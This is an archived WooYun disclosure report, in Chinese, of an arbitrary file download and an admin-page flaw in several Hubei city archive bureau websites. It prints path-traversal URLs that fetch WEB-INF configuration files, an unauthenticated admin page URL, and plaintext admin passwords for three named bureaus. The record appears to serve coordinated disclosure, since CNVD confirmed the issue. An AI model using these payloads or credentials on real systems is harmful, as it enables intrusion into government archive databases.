当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164992

漏洞标题:多市档案局任意文件下载/后台通杀(危及档案数据库安全)

相关厂商:cncert国家互联网应急中心

漏洞作者: Soulmk

提交时间:2015-12-30 00:46

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-30: 细节已通知厂商并且等待厂商处理中
2016-01-06: 厂商已经确认,细节仅向厂商公开
2016-01-16: 细节向核心白帽子及相关领域专家公开
2016-01-26: 细节向普通白帽子公开
2016-02-05: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

RT

详细说明:

网站是武汉市劲捷电子信息有限公司(http://**.**.**.**)提供技术支持的
存在任意文件下载(可获取敏感信息)和后台设计缺陷(可直接获取帐号密码!)通杀!危及档案数据库安全!

漏洞证明:

任意文件下载(可获取敏感信息)如下
荆州市档案局:

http://**.**.**.**/news.do?method=downloadFile&fileName=../../../WEB-INF/web.xml


应城市档案局:

http://**.**.**.**/childNews.do?method=downloadFile&fileName=../../../WEB-INF/struts-config.xml


潜江市档案局:

http://**.**.**.**/news.do?method=downloadFile&fileName=../../../WEB-INF/struts-config.xml


孝感市档案局:

http://**.**.**.**/news.do?method=downloadFile&fileName=../../../WEB-INF/struts-config.xml


黄冈市档案局:

http://**.**.**.**/childNews.do?method=downloadFile&fileName=../../../WEB-INF/struts-config.xml


太多了就不再一一列举了,基本上全省的档案局都是这个源码,应该都是有任意下载漏洞的~
基本上可以影响到几十家网站的,请看地图

kk.png


后台设计缺陷(可直接获取帐号密码!)通杀:

manage/admin/modify_admin.jsp?uid=1

(湖北省档案局也是这个情况,那是我提交的)
荆州市档案局:

http://**.**.**.**/manage/admin/modify_admin.jsp?uid=1


右键审查元素即可获得帐号密码: admin|jzda2011

ko.png


以下漏洞网站通杀方式同上
潜江市档案局:

http://**.**.**.**/manage/admin/modify_admin.jsp?uid=1


帐号密码:admin|888888
孝感市档案局:

http://**.**.**.**/manage/admin/modify_admin.jsp?uid=1


帐号密码:admin|123qwe
后台可以对数据库进行操作,危及档案数据库的安全!请重视!点到为止,未做任何删减破坏!拒绝查水表!
(给20Rank成不?幸苦整理了半天的⊙﹏⊙)

修复方案:

你们更专业!感谢深蓝的热心帮助!

版权声明:转载请注明来源 Soulmk@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-06 15:43

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置.

最新状态:

暂无